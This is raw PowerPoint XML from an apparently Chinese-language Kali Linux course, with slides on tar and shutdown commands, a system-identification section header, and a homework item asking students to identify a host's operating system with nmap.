          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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21" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875655" y="182880"/>
            <a:ext cx="5828030" cy="6000750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.打包压缩命令</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gzip:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bzip2:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tar :		打包压缩</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-c		归档文件</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-x		压缩文件</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-z		gzip 压缩文件</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-j		bzip2压缩文件</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-v		显示压缩或解压缩过程v( view)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-f		使用档名</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>例如:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tar-cvf /home/file.tar /home/file	只打包，不压缩</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tar-zcvf /home/file.tar.gz /home/file	打包，并用gzip压缩</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tar-jcvf /home/file.tar.bz2 /home/file	打包，并用bzip2压缩</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如果想解压缩，将上面的命令tar-cvf/tar-zcvf/tar-jcvf中的c替换成x就可以了。</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.关机重启机器</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>shutdown</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-r		关机重启</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-h		关机不重启</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>now		立刻关机</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>halt		关机</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>reboot		重启</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="10892790" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用nmap获取主机操作系统信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
